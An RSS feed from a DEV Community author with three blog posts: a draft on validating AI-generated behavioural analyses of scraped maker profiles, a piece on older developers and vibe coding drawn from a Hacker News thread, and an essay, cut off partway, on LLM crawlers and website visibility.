<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Matthew Hou</title>
    <description>The latest articles on DEV Community by Matthew Hou (@matthewhou).</description>
    <link>https://dev.to/matthewhou</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3729155%2F3707fdf0-ba9f-4e86-827c-b71650ffb8c5.png</url>
      <title>DEV Community: Matthew Hou</title>
      <link>https://dev.to/matthewhou</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/matthewhou"/>
    <language>en</language>
    <item>
      <title>You Asked AI to Analyze Your Users. The Report Looks Amazing. It's Probably Wrong.</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Mon, 13 Apr 2026 23:04:33 +0000</pubDate>
      <link>https://dev.to/matthewhou/you-asked-ai-to-analyze-your-users-the-report-looks-amazing-its-probably-wrong-1lpm</link>
      <guid>https://dev.to/matthewhou/you-asked-ai-to-analyze-your-users-the-report-looks-amazing-its-probably-wrong-1lpm</guid>
      <description>&lt;h3&gt;
  
  
  Article Draft v3
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;VP Anchors:&lt;/strong&gt; VP1 (Lower requirements on AI intelligence), VP2 (Validation is 10x more important than generation)&lt;br&gt;
&lt;strong&gt;Topic Priority:&lt;/strong&gt; ⭐⭐⭐⭐⭐ (Controversial stance + real experiment data + actionable framework)&lt;br&gt;
&lt;strong&gt;Triangle Check:&lt;/strong&gt; Skeleton ✓ | Flesh ✓ | Soul ✓&lt;br&gt;
&lt;strong&gt;Comment Hooks:&lt;/strong&gt; Either/or ("do you trust AI summaries of user feedback?"), experience collection ("what's your validation step?"), specific framework readers can challenge&lt;br&gt;
&lt;strong&gt;Estimated read time:&lt;/strong&gt; 6 min&lt;/p&gt;




&lt;p&gt;title: "You Asked AI to Analyze Your Users. The Report Looks Amazing. It's Probably Wrong."&lt;br&gt;
published: false&lt;br&gt;
description: "I collected 3,368 data points and let AI produce deep behavioral analyses. When I validated the output, I found a pattern that changes how I think about AI-driven research."&lt;br&gt;
tags: discuss, ai, datascience, webdev&lt;/p&gt;

&lt;h2&gt;
  
  
  cover_image: TBD
&lt;/h2&gt;

&lt;p&gt;You've done this. Maybe not with scraped data — maybe with survey responses, support tickets, or app reviews. You dumped a pile of user feedback into an LLM and asked: "What are the top pain points?"&lt;/p&gt;

&lt;p&gt;The AI came back with a clean, confident report. Organized by theme. Specific quotes pulled out. Patterns identified. You read it and thought: &lt;em&gt;this is genuinely insightful&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;I had that exact feeling — and then I started checking the output against reality. What I found changed how I build every AI analysis pipeline since.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Experiment
&lt;/h2&gt;

&lt;p&gt;I was doing market research — trying to understand what indie makers actually struggle with, not what they say in polished launch posts.&lt;/p&gt;

&lt;p&gt;I built a data pipeline:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;What I did&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Collect&lt;/td&gt;
&lt;td&gt;Scraped public profiles from a maker community: product pages, posts, bios&lt;/td&gt;
&lt;td&gt;3,368 raw entries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Filter&lt;/td&gt;
&lt;td&gt;Kept only entries with recent activity and revenue signals&lt;/td&gt;
&lt;td&gt;275 high-signal profiles&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Analyze&lt;/td&gt;
&lt;td&gt;Fed each profile to Claude: "Read everything. Tell me what this person is &lt;em&gt;actually&lt;/em&gt; going through."&lt;/td&gt;
&lt;td&gt;275 behavioral reports, ~1,300 chars each&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Validate&lt;/td&gt;
&lt;td&gt;Cross-referenced each AI claim against observable data&lt;/td&gt;
&lt;td&gt;The part that broke everything&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;275 profiles in. 275 confident, detailed narratives out. Each one read like a seasoned analyst had been following that person for months.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI-Generated "Insight" Actually Looks Like
&lt;/h2&gt;

&lt;p&gt;Typical output:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"This person appears to be in a carefully staged launch phase. They're asking for beta testers while claiming $10K MRR — at their price point, that implies ~200 paying customers, but nothing in their public presence supports that scale."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Sounds sharp. Here's another:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"The absence of any discussion about infrastructure costs or team composition is notable for a product at this revenue level. This reads less like building-in-public and more like someone operating a stable cash machine they'd rather not draw attention to."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Read those again. They &lt;em&gt;feel&lt;/em&gt; like analysis. But ask yourself: what is this actually based on? A product page and a couple of posts. That's it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three Failure Patterns That Show Up Every Time
&lt;/h2&gt;

&lt;p&gt;When I started validating — comparing AI claims against what I could actually observe in the raw data — the same three patterns appeared across nearly every report:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pattern&lt;/th&gt;
&lt;th&gt;What AI does&lt;/th&gt;
&lt;th&gt;The problem&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Absence = evidence&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;"The silence about X is striking"&lt;/td&gt;
&lt;td&gt;They didn't write about it. That's not the same as hiding it.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Surface = psychology&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;"This person seems to be in a calm, operational groove"&lt;/td&gt;
&lt;td&gt;That's an entire personality built from 500 words of marketing copy.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Hedging = rigor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;"seems like," "probably," "feels like"&lt;/td&gt;
&lt;td&gt;Careful &lt;em&gt;language&lt;/em&gt; on top of zero-evidence &lt;em&gt;reasoning&lt;/em&gt; is just polite guessing.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The pattern is consistent: AI takes limited data, constructs a plausible narrative, and presents it with just enough hedging to sound thoughtful. It's not lying — it's doing exactly what you asked. The problem is that &lt;em&gt;plausible&lt;/em&gt; and &lt;em&gt;true&lt;/em&gt; are completely different things, and the output doesn't tell you which one you're looking at.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;I call this "confidently plausible" — the most dangerous thing AI can produce, because it feels like insight but can't be verified from the same data that generated it.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Where AI Analysis Actually Works (and Where It Doesn't)
&lt;/h2&gt;

&lt;p&gt;The failure wasn't total. Parts of my pipeline worked perfectly. The key is knowing where the reliability boundary sits:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Reliability&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Sorting, filtering, categorizing&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;High&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Mechanical pattern-matching on explicit signals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Extracting direct quotes and keywords&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;High&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The data is literally there&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Summarizing what people &lt;em&gt;said&lt;/em&gt;
&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Medium&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Works when you verify against source text&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Inferring what people &lt;em&gt;meant&lt;/em&gt;
&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Low&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Plausible stories from insufficient data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Behavioral profiling from text&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Very low&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Narrative construction dressed as observation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;The insight that changed everything for me: don't ask AI to be smart. Ask it to be wide. AI is a funnel, not an oracle — it narrows 3,368 entries to 275 worth looking at. That filtering is genuinely valuable. The mistake is asking the funnel to also be the analyst.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  The Framework I Use Now
&lt;/h2&gt;

&lt;p&gt;After this experiment, I rebuilt my analysis pipeline around one principle: &lt;strong&gt;separate what AI observed from what AI inferred.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Structured output with forced separation.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Instead of asking AI for a blended narrative, I require three columns:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Observed:&lt;/strong&gt; Facts directly in the data. "They posted X. Their pricing is Y. They have Z followers."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Inferred:&lt;/strong&gt; AI's interpretation. "They seem to be struggling with growth."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Confidence + evidence:&lt;/strong&gt; What specific data point supports each inference?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the "inferred" column is 3x longer than "observed," you know most of the analysis is narrative — and you can treat it accordingly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2: Calibration through sampling.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I validate a 10-15% random sample in depth. Not to verify every claim — that defeats the purpose of using AI. But to learn which &lt;em&gt;categories&lt;/em&gt; of AI claims are reliable and which are noise.&lt;/p&gt;

&lt;p&gt;From my 275 reports: factual extraction and categorization held up well. Revenue assessments and psychological profiling were almost entirely narrative. Once I knew the pattern, I could filter the useful signal from the other 85% without checking each one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: AI for coverage. Humans for pattern judgment.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The right division of labor:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AI&lt;/strong&gt; processes 3,368 → 275. Extracts structured facts from each. Categorizes. Flags patterns across the dataset.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Human&lt;/strong&gt; reads the aggregated fact sheets — not 275 individual AI narratives, but the patterns AI surfaced from structured data. Then spot-checks the ones that matter.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nobody is reading 275 reports. That's the whole point. AI compresses 3,368 noisy data points into a structured, scannable dataset. You analyze the &lt;em&gt;dataset&lt;/em&gt;, not each entry. The AI does breadth. You do depth — but only where it counts.&lt;/p&gt;

&lt;p&gt;The generation is cheap. The validation architecture is where the actual value lives — and it's what most people skip.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Honest Gaps
&lt;/h2&gt;

&lt;p&gt;This framework isn't perfect. Two things I'm still iterating on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;AI is bad at flagging its own confidence.&lt;/strong&gt; It marks some wild inferences as "low confidence" while confidently stating equally ungrounded claims as "high." The self-assessment layer needs external calibration, not just AI introspection.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The observed/inferred boundary blurs at scale.&lt;/strong&gt; At 50 reports, it's manageable. At 500+, you need tooling to enforce the separation consistently. I'm building that tooling now.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  What's Your Validation Step?
&lt;/h2&gt;

&lt;p&gt;If you're using AI to analyze user feedback — reviews, support tickets, community discussions, survey responses — you're hitting this exact problem whether you know it or not.&lt;/p&gt;

&lt;p&gt;The question I keep asking other builders: &lt;strong&gt;do you have a validation step between "AI produced the analysis" and "I'm acting on it"?&lt;/strong&gt; Or does the report go straight from LLM to decision?&lt;/p&gt;

&lt;p&gt;Because I've learned the hard way: the gap between "this sounds right" and "this is right" is where the expensive mistakes hide.&lt;/p&gt;




&lt;p&gt;I don't take your attention for granted. If anything here made you think "wait, I've been doing that" or "here's what actually works for me" — I want to hear it. The framework above exists because people pushed back on my earlier assumptions. That's how it gets better.&lt;/p&gt;

</description>
      <category>discuss</category>
      <category>ai</category>
      <category>datascience</category>
      <category>webdev</category>
    </item>
    <item>
      <title>The 60-Year-Old Developer Who Broke Hacker News: This Is What Vibe Coding Actually Looks Like</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Tue, 10 Mar 2026 04:34:26 +0000</pubDate>
      <link>https://dev.to/matthewhou/the-60-year-old-developer-who-broke-hacker-news-this-is-what-vibe-coding-actually-looks-like-11l7</link>
      <guid>https://dev.to/matthewhou/the-60-year-old-developer-who-broke-hacker-news-this-is-what-vibe-coding-actually-looks-like-11l7</guid>
      <description>&lt;p&gt;&lt;em&gt;A viral post about rediscovered passion reveals what vibe coding really means — and who benefits most&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Story That Hit 1,000+ Points
&lt;/h2&gt;

&lt;p&gt;Three days ago, a 17-hour-old Hacker News account posted something that shouldn't have worked. A simple "Tell HN" story about a 60-year-old developer rediscovering his love for coding through Claude Code. No fancy startup announcement, no breakthrough research—just someone saying "I'm chasing the midnight hour and not getting any sleep."&lt;/p&gt;

&lt;p&gt;It exploded to 1,058 points and 300+ comments.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;HN Points&lt;/td&gt;
&lt;td&gt;1,058&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Comments&lt;/td&gt;
&lt;td&gt;300+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Account age when posted&lt;/td&gt;
&lt;td&gt;17 hours&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Why? Because this wasn't really a story about a retiree having fun with AI. It was a preview of the most significant shift in software development since the web itself: &lt;strong&gt;the collapse of the technical barrier between "having an idea" and "shipping software."&lt;/strong&gt; Andrej Karpathy has a name for this: &lt;strong&gt;vibe coding&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Is Vibe Coding?
&lt;/h2&gt;

&lt;p&gt;Vibe coding is a term coined by Andrej Karpathy to describe a new way of building software: you describe what you want in natural language, and AI writes the code. You don't write syntax. You don't debug line by line. You &lt;em&gt;vibe&lt;/em&gt; with the AI — iterating through conversation until the software does what you need.&lt;/p&gt;

&lt;p&gt;The 60-year-old HN poster was vibe coding without knowing it had a name. He described features to Claude Code, reviewed the output, and shipped working software. No modern framework knowledge required. No JavaScript fatigue. Just decades of knowing &lt;em&gt;what&lt;/em&gt; to build, paired with AI that handles the &lt;em&gt;how&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In practice:&lt;/strong&gt; You bring the domain expertise and the vision. AI brings the implementation. The result is working software built by people who understand the problem deeply but don't want to wrestle with React, TypeScript, or Kubernetes.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Story in the Comments
&lt;/h2&gt;

&lt;p&gt;Digging through the hundreds of responses reveals something fascinating. This wasn't just one person—it was dozens of developers in their 40s, 50s, and 60s sharing eerily similar experiences:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;50-year-old&lt;/strong&gt;: "Tools like Claude Code are the ultimate cheat code for me and have breathed new life into my desire to create"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;52-year-old CTO&lt;/strong&gt;: "Same energy here"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;66-year-old&lt;/strong&gt;: "I built three Laravel Apps from the ground up and sold one for $18,900"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These aren't just feel-good retirement stories. They're data points showing us &lt;strong&gt;who benefits first when vibe coding removes technical friction&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Generational Divide Nobody's Talking About
&lt;/h2&gt;

&lt;p&gt;The comments revealed a stark split. Older developers embraced vibe coding. Younger ones? Often anxious:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"This thread doesn't resonate with me whatsoever... So many people who agree with this admit to being in their 40s, 50s, 60s. All of them have already had the time to learn without LLMs, get industry experience... if LLMs start pushing out people from the industry, it'll be us juniors and new grads."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This divide illuminates something crucial: &lt;strong&gt;vibe coding isn't replacing programming—it's changing what programming means.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The 60-year-old in the original post had decades of experience with Active Server Pages, COM components, and VB6. He knew what he wanted to build. Claude Code just removed the tedious parts.&lt;/p&gt;

&lt;p&gt;Meanwhile, junior developers worry because their value proposition was often "I can implement what you describe faster than you can." When vibe coding handles implementation, that value evaporates.&lt;/p&gt;

&lt;h2&gt;
  
  
  What This Actually Changes
&lt;/h2&gt;

&lt;p&gt;Here's what I think the HN thread is really telling us, if you read between the lines:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The bottleneck was never "can this person code." It was "does this person know what to build and why."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The 60-year-old had business problems to solve and architectural instincts from decades of shipping. He didn't need to learn React—he needed React to get out of his way. Claude Code did that.&lt;/p&gt;

&lt;p&gt;That's not democratization of coding. That's something more specific: &lt;strong&gt;domain expertise becoming directly executable.&lt;/strong&gt; The person closest to the problem can now build the solution without a translation layer.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"The divide seems to come down to: do you enjoy the 'micro' of getting bits of code to work and fit together neatly, or the 'macro' of building systems that work? If it's the former, you hate AI agents. If it's the latter, you love AI agents."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This quote from the thread nails it. The developers thriving with vibe coding are the ones who were already thinking at the systems level. The AI just removed the tax they were paying to get there.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Part Nobody Wants to Say Out Loud
&lt;/h2&gt;

&lt;p&gt;I've been using AI coding tools daily for months now, and I'll be honest about something the HN thread mostly glossed over: &lt;strong&gt;vibe-coded software has a quality ceiling.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;AI-generated code often lacks proper error handling. Security is an afterthought. The architecture optimizes for "it works" not "it scales." I've shipped things faster than ever, and I've also spent more time debugging subtle issues that a careful manual implementation would've avoided.&lt;/p&gt;

&lt;p&gt;The 10x productivity boost is real. But it comes with a maintenance tax that nobody's measuring yet.&lt;/p&gt;

&lt;p&gt;So here's where I land on this: vibe coding is genuinely powerful for the 60-year-old's use case—someone with deep domain knowledge building tools for themselves or small teams. But the junior developer's anxiety isn't unfounded either. If your only skill is translating specs into code, you're competing against a tool that does it faster and cheaper.&lt;/p&gt;

&lt;p&gt;The move, I think, is the same one the HN thread keeps pointing to: &lt;strong&gt;go up the stack.&lt;/strong&gt; Understand the domain. Understand the users. Let AI handle the syntax. Your value is in knowing what to build and why—not how to write it.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I'm curious: are you a developer who's started vibe coding? What was the first thing you built—and what broke that you didn't expect? I've had my share of "works perfectly in demo, explodes in production" moments and I'm collecting stories.&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>productivity</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Every Website Will Soon Have Two Versions: The AI SEO Problem Nobody Is Solving</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Mon, 02 Mar 2026 22:04:20 +0000</pubDate>
      <link>https://dev.to/matthewhou/every-website-will-soon-have-two-versions-nobody-knows-who-pays-for-the-second-one-3c2h</link>
      <guid>https://dev.to/matthewhou/every-website-will-soon-have-two-versions-nobody-knows-who-pays-for-the-second-one-3c2h</guid>
      <description>&lt;p&gt;You remember when SEO first became a thing?&lt;/p&gt;

&lt;p&gt;"Why would I optimize my website for Google? People can just... visit it."&lt;/p&gt;

&lt;p&gt;Ten years later, you had an entire team doing keyword research, meta tags, backlink strategies, and schema markup. Not because you wanted to — because if Google couldn't read your site, you didn't exist.&lt;/p&gt;

&lt;p&gt;Now there's a new version of that conversation happening. "Should I make my site LLM-friendly? Should I add an &lt;code&gt;llms.txt&lt;/code&gt; file? Should I serve structured markdown alongside my HTML?"&lt;/p&gt;

&lt;p&gt;And just like SEO, the answer is probably going to be yes. Eventually. For everyone.&lt;/p&gt;

&lt;p&gt;But here's the thing that kept me up last week. Search engines at least gave traffic back. You ranked on page one, people clicked, they saw your ads, you got paid. The exchange wasn't perfect — but there was a &lt;em&gt;real feedback loop&lt;/em&gt;. You optimized your site, search sent visitors, visitors generated revenue.&lt;/p&gt;

&lt;p&gt;LLMs don't even pretend.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Search era:    You → content → search engine → user clicks → visits your site → you get paid ✅
LLM era:       You → content → LLM fetches  → synthesizes → user gets answer → you get... ❌
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;They pull from 30 sites, synthesize one answer, and cite maybe 3. You're probably not in those 3. And even if you are, the user already has their answer. Why would they click?&lt;/p&gt;

&lt;h2&gt;
  
  
  How AI Is Changing Website Visibility (Worse Each Time)
&lt;/h2&gt;

&lt;p&gt;Every major platform shift has compressed creator visibility:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;How users find you&lt;/th&gt;
&lt;th&gt;What you get back&lt;/th&gt;
&lt;th&gt;Your visibility&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Open web&lt;/strong&gt; (2000s)&lt;/td&gt;
&lt;td&gt;Bookmarks, direct URL&lt;/td&gt;
&lt;td&gt;100% of the visit&lt;/td&gt;
&lt;td&gt;██████████ Direct&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Search&lt;/strong&gt; (2010s)&lt;/td&gt;
&lt;td&gt;Search engine results&lt;/td&gt;
&lt;td&gt;Click-through to your site&lt;/td&gt;
&lt;td&gt;██████░░░░ Page 1 or invisible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Social&lt;/strong&gt; (mid-2010s)&lt;/td&gt;
&lt;td&gt;Algorithmic feeds&lt;/td&gt;
&lt;td&gt;Truncated preview, maybe a click&lt;/td&gt;
&lt;td&gt;████░░░░░░ Platform keeps the eyeballs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;LLM&lt;/strong&gt; (now)&lt;/td&gt;
&lt;td&gt;Synthesized answer&lt;/td&gt;
&lt;td&gt;A citation link nobody clicks&lt;/td&gt;
&lt;td&gt;█░░░░░░░░░ Invisible supplier&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The pattern is clear: each generation promised "more reach." Each generation delivered less direct connection between creator and audience.&lt;/p&gt;

&lt;p&gt;In the search era, at least when someone searched, they &lt;em&gt;landed on your site&lt;/em&gt;. You could show them ads, capture emails, build a relationship. Search created a real ecosystem — it rewarded good content with traffic.&lt;/p&gt;

&lt;p&gt;In the social era, your content appeared in feeds — but algorithmic, truncated, designed to keep users on-platform. You were creating content for someone else's engagement metrics.&lt;/p&gt;

&lt;p&gt;In the LLM era, your content gets fetched, synthesized with 29 other sources, and delivered as a direct answer. No click, no visit, no impression. The user doesn't even know your site exists.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Dual-Version Web: Why Every Site Needs an LLM-Friendly Version
&lt;/h2&gt;

&lt;p&gt;Here's what I'm fairly certain about: every serious website will eventually serve two versions. One for humans (the HTML/CSS/JS experience we know) and one for LLMs (structured text, clean markdown, machine-readable summaries).&lt;/p&gt;

&lt;p&gt;This isn't speculation. It's already starting:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;llms.txt&lt;/code&gt;&lt;/strong&gt; is a proposed standard — like &lt;code&gt;robots.txt&lt;/code&gt;, but instead of telling crawlers where &lt;em&gt;not&lt;/em&gt; to go, it tells LLMs where your best content is.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Structured data markup&lt;/strong&gt; (JSON-LD, schema.org) is already being used by LLMs to extract entities and relationships.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Major CMS platforms&lt;/strong&gt; are adding "AI-readable" export options.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLM-specific crawler bots&lt;/strong&gt; (GPTBot, ClaudeBot, PerplexityBot) are already hitting your server logs. Check yours — you might be surprised.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The pressure will work exactly like mobile did. First it's optional. Then it's best practice. Then your competitors do it and you fall behind if you don't. Then it's just how websites work.&lt;/p&gt;

&lt;h2&gt;
  
  
  The AI SEO Problem: No Business Model (Yet)
&lt;/h2&gt;

&lt;p&gt;Here's where the analogy breaks.&lt;/p&gt;

&lt;p&gt;When Ethan Marcotte published "Responsive Web Design" in 2010, the business case was obvious. Mobile users were &lt;em&gt;users&lt;/em&gt;. Serving them a better layout meant:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More time on site → more ad impressions&lt;/li&gt;
&lt;li&gt;Better UX → higher conversion rates
&lt;/li&gt;
&lt;li&gt;Mobile-friendly ranking boost → more traffic from search&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Every dollar you spent on responsive design came back with interest. The incentives were perfectly aligned.&lt;/p&gt;

&lt;p&gt;LLM-facing content has no equivalent feedback loop. Compare the two:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Responsive Design (2010):
You invest in mobile layout → Mobile users visit → They see ads → You get paid
      💰 ←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←← 💰
                        Revenue flows back

LLM-Facing Content (now):
You invest in structured content → LLM fetches it → User gets answer → User never visits
      💰 →→→→→→→→→→→→→→→→→→→→→→→ 🤖 →→→→→→→→→→→ 👤
                        Revenue flows... somewhere else
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the core problem. Responsive design was a win-win. LLM-facing content, right now, is a win for LLM companies and a question mark for everyone else.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI SEO and LLM Optimization Will Look Like
&lt;/h2&gt;

&lt;p&gt;I don't think the answer is "block all LLMs" — that's like blocking Googlebot in 2005. You disappear.&lt;/p&gt;

&lt;p&gt;I think what actually happens is the business model catches up, like it always does. But it'll look different from ads-and-traffic. Here's where I'd put my chips:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Content becomes an API product.&lt;/strong&gt;&lt;/p&gt;

